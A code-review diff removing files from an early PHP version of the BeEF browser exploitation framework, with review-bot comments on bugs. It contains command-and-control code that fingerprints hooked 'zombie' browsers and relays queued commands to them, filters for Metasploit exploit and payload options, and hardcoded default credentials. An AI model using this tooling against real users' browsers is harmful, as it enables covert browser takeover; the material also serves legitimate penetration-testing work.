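Review bot: INSTALL_WARNING_TEXT tells the user to edit the BASE_DIR define in globals.inc.php, but this file never defines BASE_DIR; it only uses it after require_once("config.inc.php"), so the message appears to name the wrong file. The same string has typos ("dirrctory", "BeEf") and no space after "correctly.". HEARTBEAT_TIME is defined as the string "10000" while the neighbouring HEARTBEAT_FREQUENCY is an integer.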

View File

@@ -1,65 +0,0 @@
<?php
// Copyright (c) 2006-2010, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../include/globals.inc.php");
require_once("../include/browserdetection.inc.php");
// --[ EXTRACT_OS
function extract_os() {
$user_parts = explode(";", $_SERVER['HTTP_USER_AGENT']);
$os = trim($user_parts[2]);
$os = str_replace(')', '', $os);
return $os;
}
// ---[ GET_UA_DETAILS
function get_ua_details() {
$ip = $_SERVER['REMOTE_ADDR'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$browser = browser($_SERVER['HTTP_USER_AGENT']);
$os = extract_os();
// return the collected useragent details
return $ip . "\n" .
$browser['name'] . "\n" .
$browser['version'] . "\n" .
$os . "\n" .
$agent;
}
// ---[ REGISTER_HEARTBEAT
function register_heartbeat($status, $result) {
// construct file location strings
$zombie_hook_dir = ZOMBIE_TMP_DIR . session_id();
$zombie_hook_heartbeat_file = $zombie_hook_dir . "/" . HEARTBEAT_FILENAME;
$zombie_hook_cmd_file = $zombie_hook_dir . "/" . CMD_FILENAME;
$zombie_hook_res_file = $zombie_hook_dir . "/" . RES_FILENAME;
// create a directory for this zombie if it doens't exist
if(!file_exists($zombie_hook_dir)) {
mkdir($zombie_hook_dir);
}
// heartbeat
// write the heartbeat details to file
file_put_contents($zombie_hook_heartbeat_file, get_ua_details());
// if there is a result write it to file
if($status != HEARTBEAT_NOP) {
file_put_contents($zombie_hook_res_file, $result);
}
if(!file_exists($zombie_hook_cmd_file)) { return 0; }
// get the command from $zombie_hook_cmd_file
$lines = file($zombie_hook_cmd_file);
unlink($zombie_hook_cmd_file);
return join("\n", $lines);
}
?>
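
Review bot: extract_os() reads `$user_parts[2]` without checking that explode(";", ...) produced at least three parts, so any User-Agent with fewer than two semicolons, or a request with no User-Agent header, raises a notice and writes an empty OS line to the heartbeat file. Guard with isset() and fall back to a default string. register_heartbeat() compares against HEARTBEAT_NOP, which is not among the constants defined in the globals.inc.php shown on this page.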

View File

@@ -1,7 +0,0 @@
<?php
define('MSF_HOST', '127.0.0.1');
define('MSF_PORT', '55553');
define('MSF_USER', 'msf');
define('MSF_PASS', 'BeEFMSFPass');
define('MSF_BASE_URL', 'http://192.168.1.235');
?>
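
Review bot: MSF_USER and MSF_PASS are committed as literal values, and MSF_BASE_URL points at a specific private address (192.168.1.235), so every checkout inherits the same default credentials and one developer's network layout. Ship this as a sample file with placeholders and keep the real config out of version control. The file also lacks the copyright header the other includes carry.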

View File

@@ -1,134 +0,0 @@
<?php
// Copyright (c) 2006-2010, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("filter.inc.php");
function get_and_filter_exploit() {
$exploit = $_GET["exploit"];
if(strlen($exploit) > 50) {
return FALSE;
}
if( !( preg_match("/multi\/browser\/[a-z_]+/", $exploit) ||
preg_match("/osx\/browser\/[a-z_]+/", $exploit) ||
preg_match("/windows\/browser\/[a-z_]+/", $exploit)) ) {
return FALSE;
}
return $exploit;
}
function get_and_filter_payload() {
$payload = $_GET["payload"];
if(strlen($payload) > 50) {
return FALSE;
}
if( !preg_match("/[a-z_]+\/[a-z_]+[\/[a-z_]+]{0,1}/", $payload) ) {
return FALSE;
}
return $payload;
}
function valid_exitfunc($func) {
if ( ($func == "seh") || ($func == "thread") || ($func == "process") ) {
return true;
}
return true;
}
function valid_srvhost($ip) {
return valid_ip($ip);
}
function valid_srvport($port) {
return valid_port($port);
}
function valid_urlpath($path) {
if( ! preg_match("/^[a-zA-Z0-9\/\.]*$/", $path) ) return FALSE;
return TRUE;
}
function get_and_filter_smb_capture_options() {
$options = array();
// SRVHOST
if(!$_GET["SRVHOST"]) return FALSE;
if(!valid_ip($_GET["SRVHOST"])) return FALSE;
$options["SRVHOST"] = $_GET["SRVHOST"];
// SRVPORT
if(!$_GET["SRVPORT"]) return FALSE;
if(!valid_port($_GET["SRVPORT"])) return FALSE;
$options["SRVPORT"] = $_GET["SRVPORT"];
// URIPATH
if($_GET["URIPATH"]) {
if(!valid_urlpath($_GET["URIPATH"])) return FALSE;
$options["URIPATH"] = $_GET["URIPATH"];
}
return $options;
}
function get_and_filter_module_options() {
$options = array();
// PAYLOAD
$options["PAYLOAD"] = get_and_filter_payload();
// SRVHOST
if(!$_GET["SRVHOST"]) return FALSE;
if(!valid_ip($_GET["SRVHOST"])) return FALSE;
$options["SRVHOST"] = $_GET["SRVHOST"];
// SRVPORT
if(!$_GET["SRVPORT"]) return FALSE;
if(!valid_port($_GET["SRVPORT"])) return FALSE;
$options["SRVPORT"] = $_GET["SRVPORT"];
// LPORT
if($_GET["LPORT"]) {
if(!valid_port($_GET["LPORT"])) return FALSE;
$options["LPORT"] = $_GET["LPORT"];
}
// RHOST
if($_GET["RHOST"]) {
if(!valid_ip($_GET["RHOST"])) return FALSE;
$options["RHOST"] = $_GET["RHOST"];
}
// LHOST
if($_GET["LHOST"]) {
if(!valid_ip($_GET["LHOST"])) return FALSE;
$options["LHOST"] = $_GET["LHOST"];
}
// URIPATH
if($_GET["URIPATH"]) {
if(!valid_urlpath($_GET["URIPATH"])) return FALSE;
$options["URIPATH"] = $_GET["URIPATH"];
}
// EXITFUNC
if($_GET["EXITFUNC"]) {
if(!valid_exitfunc($_GET["EXITFUNC"])) return FALSE;
$options["EXITFUNC"] = $_GET["EXITFUNC"];
}
return $options;
}
?>
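
Review bot: valid_exitfunc() returns true on both paths, so the EXITFUNC check in get_and_filter_module_options() accepts any value; the final `return true;` should be `return false;`. The patterns in get_and_filter_exploit() and get_and_filter_payload() have no `^` and `$` anchors, so they pass any string that merely contains a matching substring, and `[\/[a-z_]+]{0,1}` in the payload pattern is a malformed character class rather than an optional group. get_and_filter_module_options() also stores the PAYLOAD result without checking it for FALSE.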

View File

@@ -1,96 +0,0 @@
<?php
// Copyright (c) 2006-2010, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
// ---[ GET_MODULE_BUTTONS_HTML
// usage: get_module_button_html(button name/lable, browser request path)
function get_module_button_html($name, $path) {
$result = MODULE_BUTTON_HTML;
$result = str_replace("NAME", $name, $result); // button name
$result = str_replace("PATH", $path, $result); // path to module
return $result;
}
function get_module_menu_item_html($name, $path) {
$result = MODULE_MENU_ITEM_HTML;
$result = str_replace("NAME", $name, $result); // button name
$result = str_replace("PATH", $path, $result); // path to module
return $result;
}
// --[ GET_STANDARD_MODULE_MENU
function get_standard_module_menu() {
$menu_str .= get_module_menu(MODULE_STANDARD_DIR, MODULE_STANDARD_SUBDIR);
return $menu_str;
}
// --[ GET_BROWSER_MODULE_MENU
function get_browser_module_menu() {
$menu_str .= get_module_menu(MODULE_BROWSER_DIR, MODULE_BROWSER_SUBDIR);
return $menu_str;
}
// --[ GET_BROWSER_MODULE_MENU
function get_network_module_menu() {
$menu_str .= get_module_menu(MODULE_NETWORK_DIR, MODULE_NETWORK_SUBDIR);
return $menu_str;
}
// --[ GET_INTERPROTOCOL_MODULE_MENU
function get_interprotocol_module_menu() {
$menu_str .= get_module_menu(MODULE_INTERPROTOCOL_DIR, MODULE_INTERPROTOCOL_SUBDIR);
return $menu_str;
}
// ---[ GET_MODULE_MENU
function get_module_menu($module_dir, $module_subdir) {
$result = "";
$wildcard = $module_dir . '*';
// iterate through the module directories
foreach (glob($wildcard) as $dirname) {
// get module name from file
$name = file_get_contents($dirname . '/' . MODULE_NAME_FILENAME);
// create html module buttons
$result .= get_module_menu_item_html(trim($name), "/beef/modules/". $module_subdir . "/" . basename($dirname));
}
return $result;
}
// ---[ GET_ALL_MODULE_BUTTONS_HTML
function get_all_module_menu_items_html() {
$result = "";
$wildcard = MODULE_SYMMETRIC_DIR . '*';
// iterate through the module directories
foreach (glob($wildcard) as $dirname) {
// get module name from file
$name = join("\n", file($dirname . '/' . MODULE_NAME_FILENAME));
// create html module buttons
$result .= get_module_menu_item_html(trim($name), "/beef/modules/symmetric/" . basename($dirname));
}
return $result;
}
// ---[ GET_ALL_MODULE_BUTTONS_HTML
function get_all_module_buttons_html() {
$result = "";
$wildcard = MODULE_SYMMETRIC_DIR . '*';
// iterate through the module directories
foreach (glob($wildcard) as $dirname) {
// get module name from file
$name = join("<br>", file($dirname . '/' . MODULE_NAME_FILENAME));
// create html module buttons
$result .= get_module_button_html(trim($name), "/symmetric/" . basename($dirname));
}
return $result;
}
?>
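
Review bot: the four get_*_module_menu() wrappers append with `$menu_str .=` to a variable that was never initialised, which raises a notice on every call; return the get_module_menu() result directly. get_all_module_menu_items_html() and get_all_module_buttons_html() use MODULE_SYMMETRIC_DIR, which is not among the module constants defined in the globals.inc.php shown on this page. The module name read from name.txt is placed into the HTML templates without encoding, and the comments above get_network_module_menu() and get_all_module_menu_items_html() name the wrong functions.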

View File

@@ -1,230 +0,0 @@
<?php
// Copyright (c) 2006-2010, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("globals.inc.php");
require_once("browserdetection.inc.php");
require_once("common.inc.php");
// ---[ GET_ZOMBIE_OS
// the output of this function must be escaped
function get_zombie_os($zombie_id) {
$heartbeat_file = ZOMBIE_TMP_DIR . $_SESSION[$zombie_id] . "/" . HEARTBEAT_FILENAME;
$zombie_heartbeat_contents = file($heartbeat_file);
return $zombie_heartbeat_contents[3];
}
// ---[ GET_ZOMBIE_BROWSER
// the output of this function must be escaped
function get_zombie_browser($zombie_id) {
$heartbeat_file = ZOMBIE_TMP_DIR . $_SESSION[$zombie_id] . "/" . HEARTBEAT_FILENAME;
$zombie_heartbeat_contents = file($heartbeat_file);
return trim($zombie_heartbeat_contents[1]) . " " . trim($zombie_heartbeat_contents[2]);
}
// ---[ GET_ZOMBIE_METADATA
function get_zombie_metadata($zombie_id) {
$heartbeat_file = ZOMBIE_TMP_DIR . $_SESSION[$zombie_id] . "/" . HEARTBEAT_FILENAME;
$zombie_details = get_zombie_data($heartbeat_file);
$zombie_data = trim($zombie_details['ip']);
$zombie_data .= ',' . $zombie_details['agent_image'];
$zombie_data .= ',' . $zombie_details['os_image'];
return $zombie_data;
}
// ---[ GET_ZOMBIE_IP
function get_zombie_ip($zombie_id) {
$heartbeat_file = ZOMBIE_TMP_DIR . $_SESSION[$zombie_id] . "/" . HEARTBEAT_FILENAME;
$zombie_details = get_zombie_data($heartbeat_file);
return trim($zombie_details['ip']);
}
// --[ GET_ZOMBIE_VAR
function get_zombie_var() {
if(!isset($_GET["zombie"])) { beef_error('no zombie submitted'); }
$zombie = $_GET["zombie"];
if(!isset($_SESSION[$zombie])) { beef_error('zombie not in session'); }
return $zombie;
}
// --[ GET_ZOMBIE_DATAFILE
function get_zombie_datafile($filename) {
$zombie = get_zombie_var();
$zombie_dir = ZOMBIE_TMP_DIR . $_SESSION[$zombie];
$zombie_file = $zombie_dir . "/" . $filename;
if(!file_exists($zombie_file)) {
return DNA_STRING;
}
return file_get_contents($zombie_file);
}
// --[ DELETE_ZOMBIE_RESULTS
function delete_zombie_results() {
$zombie = get_zombie_var();
$zombie_dir = ZOMBIE_TMP_DIR . $_SESSION[$zombie];
$zombie_file = $zombie_dir . "/" . RES_FILENAME;
if(file_exists($zombie_file)) {
unlink($zombie_file);
}
}
// ---[ GET_ZOMBIE_LIST
function get_zombie_list() {
$result = "";
// check installed properly
if(!file_exists(BASE_DIR)) {
return INSTALL_WARNING;
}
$d = opendir(ZOMBIE_TMP_DIR);
if(!$d) return false;
// iterate through directory and parse the heartbeat files
while($dir_name = readdir($d)) {
if(!is_dir(ZOMBIE_TMP_DIR . $dir_name)) { continue; } // skip files
$heartbeat_file = ZOMBIE_TMP_DIR . $dir_name . "/" . HEARTBEAT_FILENAME;
if(!file_exists($heartbeat_file)) { continue; } // check heartbeat exists
// check that the heartbeat file is within the age window (HEARTBEAT_TIME)
$filetime = date("U",filemtime($heartbeat_file));
if((time() - $filetime) < ((HEARTBEAT_TIME/1000)+1)) {
// parse zombie details into $zombie_details
$_SESSION[md5($dir_name)] = $dir_name;
$zombie_details = get_zombie_data($heartbeat_file);
$zombie_details['id'] = md5($dir_name);
if(!empty($result)) $result .= ",";
$result .= $zombie_details['id'];
} else {
// this means the zombie has been lost
// leave history/details in directory
}
}
closedir($d);
// if no zombies return the default value
if($result == "") { $result = 'none'; }
return $result;
}
// --[ GET_ZOMBIE_MENU
function get_zombie_menu() {
$result = "";
// check installed properly
if(!file_exists(BASE_DIR)) {
return INSTALL_WARNING;
}
$d = opendir(ZOMBIE_TMP_DIR);
if(!$d) return false;
// iterate through directory and parse the heartbeat files
while($dir_name = readdir($d)) {
if(!is_dir(ZOMBIE_TMP_DIR . $dir_name)) { continue; } // skip files
$heartbeat_file = ZOMBIE_TMP_DIR . $dir_name . "/" . HEARTBEAT_FILENAME;
if(!file_exists($heartbeat_file)) { continue; } // check heartbeat exists
// check that the heartbeat file is within the age window (HEARTBEAT_TIME)
$filetime = date("U",filemtime($heartbeat_file));
if((time() - $filetime) < ((HEARTBEAT_TIME/1000)+1)) {
// parse zombie details into $zombie_details
$_SESSION[md5($dir_name)] = $dir_name;
$zombie_details = get_zombie_data($heartbeat_file);
$zombie_details['id'] = trim(md5($dir_name));
$result .= '<li><a href="javascript:change_zombie(\'' . $zombie_details['id'] . '\')">' .
'<img src="/beef/images/' . $zombie_details['agent_image'] . '" align="top" border="0" height="12" width="12" vspace="2"> ' .
'<img src="/beef/images/' . $zombie_details['os_image'] . '" align="top" border="0" height="12" width="12" vspace="2"> ' .
$zombie_details['ip'] . '</a></li>';
} else {
// this means the zombie has been lost
// leave history/details in directory
}
}
closedir($d);
// if no zombies return the default value
if($result == "") { $result = ZOMBIE_NONE; }
return $result;
}
// ---[ GET_ZOMBIE_DATA
function get_zombie_data($file){
$browser_details = file_get_contents($file);
$zombie_data['ip'] = extract_zombie_ip($browser_details);
$zombie_data['agent_image'] = extract_zombie_useragent($browser_details);
$zombie_data['os_image'] = extract_zombie_os($browser_details);
return $zombie_data;
}
// ---[ EXTRACT_ZOMBIE_IP
function extract_zombie_ip($raw_zombie_data) {
// get ip address from data
return substr("$raw_zombie_data",0,strpos($raw_zombie_data,"\n")+strlen("\n"));
}
// ---[ EXTRACT_ZOMBIE_USERAGENT
function extract_zombie_useragent($raw_zombie_data) {
// find agent type
if(stristr($raw_zombie_data, AGENT_FIREFOX_UA_STR)) {
return AGENT_FIREFOX_IMG;
}
if(stristr($raw_zombie_data, AGENT_IE_UA_STR)) {
return AGENT_IE_IMG;
}
if(stristr($raw_zombie_data, AGENT_CHROME_UA_STR)) {
return AGENT_CHROME_IMG;
}
if(stristr($raw_zombie_data, AGENT_SAFARI_UA_STR)) {
return AGENT_SAFARI_IMG;
}
if(stristr($raw_zombie_data, AGENT_KONQ_UA_STR)) {
return AGENT_KONQ_IMG;
}
if(stristr($raw_zombie_data, AGENT_MOZILLA_UA_STR)) {
return AGENT_MOZILLA_IMG;
}
return AGENT_UNKNOWN_IMG;
}
// ---[ EXTRACT_ZOMBIE_OS
function extract_zombie_os($raw_zombie_data) {
// find os type
if(stristr($raw_zombie_data, OS_WINDOWS_UA_STR)) {
return OS_WINDOWS_IMG;
}
if(stristr($raw_zombie_data, OS_LINUX_UA_STR)) {
return OS_LINUX_IMG;
}
if(stristr($raw_zombie_data, OS_MAC_UA_STR)) {
return OS_MAC_IMG;
}
return OS_UNKNOWN_IMG;
}
?>
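
Review bot: get_zombie_menu() concatenates $zombie_details['ip'] straight into the <li> markup, while get_zombie_os() and get_zombie_browser() only carry a comment saying the output must be escaped. The value is the first line of the heartbeat file as returned by extract_zombie_ip(), so pass it through htmlspecialchars() at the point of output instead of relying on callers. extract_zombie_ip() also keeps the trailing newline and returns a single character when the file contains no newline, because strpos() then yields false. The directory scan is duplicated between get_zombie_list() and get_zombie_menu(), so a fix applied to one is easy to miss in the other.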

File diff suppressed because it is too large

126
index.php

@@ -1,126 +0,0 @@
<?php
// Copyright (c) 2006-2010, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<?php
require_once("include/browserdetection.inc.php");
require_once("include/filter.inc.php");
// set the menu css based upon user agent
$browser_ua = browser($_SERVER['HTTP_USER_AGENT']);
function generate_css_tags($subdirectory) {
$menu_css = ' <link rel="stylesheet" type="text/css" href="css/USERAGENT/menu.css">';
$style_css = ' <link rel="stylesheet" type="text/css" href="css/USERAGENT/style.css">';
echo preg_replace('/USERAGENT/', $subdirectory, $menu_css);
echo preg_replace('/USERAGENT/', $subdirectory, $style_css);
}
// set css based on the user agent
if(stristr($browser_ua['name'], "Firefox")) {
generate_css_tags('firefox');
} elseif(stristr($browser_ua['name'], "Internet Explorer")) {
generate_css_tags('ie');
} elseif(stristr($browser_ua['name'], "Safari")) {
generate_css_tags('safari');
} else {
generate_css_tags('firefox');
}
$url = "http://" . $_SERVER['SERVER_NAME']. $_SERVER['REQUEST_URI'];
if(! valid_url_without_query($url)) $url = "";
?>
<title>Browser Exploit Framework</title>
<link rel="icon" href="favicon.ico" type="image/x-icon">
<script src="js/prototype.js" type="text/javascript"></script>
<script src="js/scriptaculous.js" type="text/javascript"></script>
<script src="js/common.js" type="text/javascript"></script>
<script>
// ---[ BEEF_ERROR
function beef_error(error_string) {
new Effect.Shake('beef_icon');
alert(error_string);
}
// ---[ SUBMIT_CONFIG
function submit_config(config, passwd) {
new Ajax.Updater('config_results', 'submit_config.php?config=' + config + '&passwd=' + passwd, {asynchronous:true});
}
</script>
</head>
<body>
<!-- SIDEBAR -->
<div id="sidebar">
<!-- BEEF HEADER - LINK AND IMAGE-->
<div id="header">
<center><a href=http://www.bindshell.net/tools/beef/>Browser Exploitation Framework</a></center>
<h1><div id="beef_icon"><img src="images/beef.gif" onclick="new Effect.Shake('sidebar');"></div> BeEF</h1>
</div>
<!-- Security -->
<div id="sidebar_autorun">
<div id="header" onclick="new Effect.Pulsate('zombiesdyn');">
<h2>Security</h2>
</div>
<div id="content">
<!-- DYNAMIC ZOMBIE SECTION -->
<div id="autorun_dyn">BeEF has no security by design <br><br></div>
<div id="autorun_dyn">Default password is <b>BeEFConfigPass</b> <br><br></div>
<div id="autorun_dyn">Edit 'pw.php' in BeEF root to alter the password</div>
</div>
</div>
<!-- INSTALL -->
<div id="sidebar_autorun">
<div id="header" onclick="new Effect.Pulsate('zombiesdyn');">
<!--<h2>Installation</h2>-->
</div>
<div id="content">
<!-- DYNAMIC ZOMBIE SECTION -->
<!-- <div id="autorun_dyn">BeEF has not been installed</div> -->
</div>
</div>
</div>
<!-- MAIN RIGHT SECTION -->
<div id="main">
<div id="page">
<div id="module_header">BeEF Configuration</div>
<br>
<div id="module_subsection">
<form name="configform">
<div id="module_subsection_header">Connection (IP Address or URL)</div>
This is the location that the zombies will connect to (do not include the hook directory). This must match the 'ServerName' value in your http.conf for the modules to work.
<input type="text" name="url" value="<?php echo $url; ?>" autocomplete="off"/>
BeEF configuration password
<input type="password" name="passwd" value="BeEFConfigPass" autocomplete="off"/>
<input class="button" type="button" value="Apply Config" onClick="javascript:submit_config(configform.url.value, configform.passwd.value)"/>
<br>Clicking 'Apply Configuration' will remove/replace these configuration files
</form>
</div>
<div id='config_results'></div>
</div>
</div>
</div>
</body>
</html>
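
Review bot: submit_config() builds 'submit_config.php?config=' + config + '&passwd=' + passwd, which places the configuration password in the request URL, where it will appear wherever request URLs are recorded, and neither value goes through encodeURIComponent(). Send both as encoded request parameters in the body instead of the query string. The password input is also pre-filled with the default value shown in the sidebar, and $url is echoed into the value attribute without htmlspecialchars(), relying entirely on valid_url_without_query().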

@@ -1,33 +0,0 @@
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
// --[ AUTORUN CLASS
var Autorun = Class.create();
Autorun.prototype = {
initialize: function() {
this.version = '0.1',
this.authors = 'Wade Alcorn <wade@bindshell.net>',
this.enabled = false,
this.module = '',
this.code = ''
},
// params: string to be displayed in sidebar, base64 encode code
enable: function(module_name, code) {
this.code = code;
var params = 'data='+code;
new Ajax.Updater('module_status', 'send_cmds.php?action=autorun', {method:'post',parameters:params,asynchronous:false});
this.enabled = true;
this.module = module_name;
$('autorun_dyn').innerHTML = this.module + ' Module Enabled';
},
disable: function() {
var params = 'data=disable';
new Ajax.Updater('module_status', 'send_cmds.php?action=autorun', {method:'post',parameters:params,asynchronous:false});
this.enabled = false;
this.module = '';
this.status = 'Disabled';
$('autorun_dyn').innerHTML = this.status;
}
}
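
Review bot: enable() builds the POST body as 'data='+code, and the comment above it says code is base64, whose alphabet includes '+', '/' and '='. Without encodeURIComponent(code) a form decoder reads '+' as a space, so the payload can arrive altered unless send_cmds.php compensates, which is not visible here. Separately, initialize() chains its assignments with commas instead of semicolons, and disable() sets this.status, which initialize() never defines.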

@@ -1,101 +0,0 @@
// Copyright (c) 2005 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
//
// See scriptaculous.js for full license.
var Builder = {
NODEMAP: {
AREA: 'map',
CAPTION: 'table',
COL: 'table',
COLGROUP: 'table',
LEGEND: 'fieldset',
OPTGROUP: 'select',
OPTION: 'select',
PARAM: 'object',
TBODY: 'table',
TD: 'table',
TFOOT: 'table',
TH: 'table',
THEAD: 'table',
TR: 'table'
},
// note: For Firefox < 1.5, OPTION and OPTGROUP tags are currently broken,
// due to a Firefox bug
node: function(elementName) {
elementName = elementName.toUpperCase();
// try innerHTML approach
var parentTag = this.NODEMAP[elementName] || 'div';
var parentElement = document.createElement(parentTag);
try { // prevent IE "feature": http://dev.rubyonrails.org/ticket/2707
parentElement.innerHTML = "<" + elementName + "></" + elementName + ">";
} catch(e) {}
var element = parentElement.firstChild || null;
// see if browser added wrapping tags
if(element && (element.tagName != elementName))
element = element.getElementsByTagName(elementName)[0];
// fallback to createElement approach
if(!element) element = document.createElement(elementName);
// abort if nothing could be created
if(!element) return;
// attributes (or text)
if(arguments[1])
if(this._isStringOrNumber(arguments[1]) ||
(arguments[1] instanceof Array)) {
this._children(element, arguments[1]);
} else {
var attrs = this._attributes(arguments[1]);
if(attrs.length) {
try { // prevent IE "feature": http://dev.rubyonrails.org/ticket/2707
parentElement.innerHTML = "<" +elementName + " " +
attrs + "></" + elementName + ">";
} catch(e) {}
element = parentElement.firstChild || null;
// workaround firefox 1.0.X bug
if(!element) {
element = document.createElement(elementName);
for(attr in arguments[1])
element[attr == 'class' ? 'className' : attr] = arguments[1][attr];
}
if(element.tagName != elementName)
element = parentElement.getElementsByTagName(elementName)[0];
}
}
// text, or array of children
if(arguments[2])
this._children(element, arguments[2]);
return element;
},
_text: function(text) {
return document.createTextNode(text);
},
_attributes: function(attributes) {
var attrs = [];
for(attribute in attributes)
attrs.push((attribute=='className' ? 'class' : attribute) +
'="' + attributes[attribute].toString().escapeHTML() + '"');
return attrs.join(" ");
},
_children: function(element, children) {
if(typeof children=='object') { // array can hold nodes and text
children.flatten().each( function(e) {
if(typeof e=='object')
element.appendChild(e)
else
if(Builder._isStringOrNumber(e))
element.appendChild(Builder._text(e));
});
} else
if(Builder._isStringOrNumber(children))
element.appendChild(Builder._text(children));
},
_isStringOrNumber: function(param) {
return(typeof param=='string' || typeof param=='number');
}
}
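
Review bot: _attributes() escapes attribute values with escapeHTML() and wraps them in double quotes for the innerHTML assignment in node(); that is only safe if escapeHTML() also escapes the double quote, which this hunk does not show, and attribute names are concatenated with no escaping at all. Setting attributes on the created element, as the Firefox 1.0.X fallback branch already does, avoids the string building. The loops for(attr in arguments[1]) and for(attribute in attributes) declare no var, so both variables leak into the global scope.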

@@ -1,110 +0,0 @@
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
// --[ DIFF
// diff two arrays
function diff(a,b) {
var c = new Array();
a.each( function(element) {
if(0 > b.indexOf(element)) {
c.push(element);
}
})
return c;
}
// --[ B64REPLACE
// replace a string in a base64 string
function b64replace(b64str, srcstr, deststr) {
str = decode64(b64str);
str = str.replace(srcstr, deststr);
result = encode64(str);
return result;
}
// array code from http://4umi.com/web/javascript/array.htm
Array.prototype.indexOf=function(n){for(var i=0;i<this.length;i++){if(this[i]===n){return i;}}return -1;}
Array.prototype.lastIndexOf=function(n){var i=this.length;while(i--){if(this[i]===n){return i;}}return -1;}
Array.prototype.forEach=function(f){var i=this.length,j,l=this.length;for(i=0;i<l;i++){if((j=this[i])){f(j);}}};
Array.prototype.insert=function(i,v){if(i>=0){var a=this.slice(),b=a.splice(i);a[i]=value;return a.concat(b);}}
Array.prototype.shuffle=function(){var i=this.length,j,t;while(i--){j=Math.floor((i+1)*Math.random());t=arr[i];arr[i]=arr[j];arr[j]=t;}}
Array.prototype.unique=function(){var a=[],i;this.sort();for(i=0;i<this.length;i++){if(this[i]!==this[i+1]){a[a.length]=this[i];}}return a;}
if(typeof Array.prototype.concat==='undefined'){Array.prototype.concat=function(a){for(var i=0,b=this.copy();i<a.length;i++){b[b.length]=a[i];}return b;};}
if(typeof Array.prototype.copy==='undefined'){Array.prototype.copy=function(a){var a=[],i=this.length;while(i--){a[i]=(typeof this[i].copy!=='undefined')?this[i].copy():this[i];}return a;};}
if(typeof Array.prototype.pop==='undefined'){Array.prototype.pop=function(){var b=this[this.length-1];this.length--;return b;};}
if(typeof Array.prototype.push==='undefined'){Array.prototype.push=function(){for(var i=0,b=this.length,a=arguments;i<a.length;i++){this[b+i]=a[i];}return this.length;};}
if(typeof Array.prototype.shift==='undefined'){Array.prototype.shift=function(){for(var i=0,b=this[0];i<this.length-1;i++){this[i]=this[i+1];}this.length--;return b;};}
if(typeof Array.prototype.slice==='undefined'){Array.prototype.slice=function(a,c){var i=0,b,d=[];if(!c){c=this.length;}if(c<0){c=this.length+c;}if(a<0){a=this.length-a;}if(c<a){b=a;a=c;c=b;}for(i;i<c-a;i++){d[i]=this[a+i];}return d;};}
if(typeof Array.prototype.splice==='undefined'){Array.prototype.splice=function(a,c){var i=0,e=arguments,d=this.copy(),f=a;if(!c){c=this.length-a;}for(i;i<e.length-2;i++){this[a+i]=e[i+2];}for(a;a<this.length-c;a++){this[a+e.length-2]=d[a-c];}this.length-=c-e.length+2;return d.slice(f,f+c);};}
if(typeof Array.prototype.unshift==='undefined'){Array.prototype.unshift=function(a){this.reverse();var b=this.push(a);this.reverse();return b;};}
// Base64 code from Tyler Akins -- http://rumkin.com
var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
function encode64(input) {
var output = "";
var chr1, chr2, chr3;
var enc1, enc2, enc3, enc4;
var i = 0;
do {
chr1 = input.charCodeAt(i++);
chr2 = input.charCodeAt(i++);
chr3 = input.charCodeAt(i++);
enc1 = chr1 >> 2;
enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
enc4 = chr3 & 63;
if (isNaN(chr2)) {
enc3 = enc4 = 64;
} else if (isNaN(chr3)) {
enc4 = 64;
}
output = output + keyStr.charAt(enc1) + keyStr.charAt(enc2) +
keyStr.charAt(enc3) + keyStr.charAt(enc4);
} while (i < input.length);
return output;
}
function decode64(input) {
var output = "";
var chr1, chr2, chr3;
var enc1, enc2, enc3, enc4;
var i = 0;
// remove all characters that are not A-Z, a-z, 0-9, +, /, or =
input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");
do {
enc1 = keyStr.indexOf(input.charAt(i++));
enc2 = keyStr.indexOf(input.charAt(i++));
enc3 = keyStr.indexOf(input.charAt(i++));
enc4 = keyStr.indexOf(input.charAt(i++));
chr1 = (enc1 << 2) | (enc2 >> 4);
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
chr3 = ((enc3 & 3) << 6) | enc4;
output = output + String.fromCharCode(chr1);
if (enc3 != 64) {
output = output + String.fromCharCode(chr2);
}
if (enc4 != 64) {
output = output + String.fromCharCode(chr3);
}
} while (i < input.length);
return output;
}
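
Review bot: two of the Array.prototype helpers cannot work as written: insert(i,v) assigns a[i]=value although the parameter is v, and shuffle() swaps arr[i] and arr[j] although no arr exists (it should operate on this), so both throw a ReferenceError when called. indexOf, lastIndexOf and forEach are assigned unconditionally, unlike the typeof-guarded definitions below them, and this forEach skips falsy elements such as 0 or ''. b64replace() assigns str and result without var, which makes them globals.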

821
js/controls.js vendored

@@ -1,821 +0,0 @@
// Copyright (c) 2005 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005 Ivan Krstic (http://blogs.law.harvard.edu/ivan)
// (c) 2005 Jon Tirsen (http://www.tirsen.com)
// Contributors:
// Richard Livsey
// Rahul Bhargava
// Rob Wills
//
// See scriptaculous.js for full license.
// Autocompleter.Base handles all the autocompletion functionality
// that's independent of the data source for autocompletion. This
// includes drawing the autocompletion menu, observing keyboard
// and mouse events, and similar.
//
// Specific autocompleters need to provide, at the very least,
// a getUpdatedChoices function that will be invoked every time
// the text inside the monitored textbox changes. This method
// should get the text for which to provide autocompletion by
// invoking this.getToken(), NOT by directly accessing
// this.element.value. This is to allow incremental tokenized
// autocompletion. Specific auto-completion logic (AJAX, etc)
// belongs in getUpdatedChoices.
//
// Tokenized incremental autocompletion is enabled automatically
// when an autocompleter is instantiated with the 'tokens' option
// in the options parameter, e.g.:
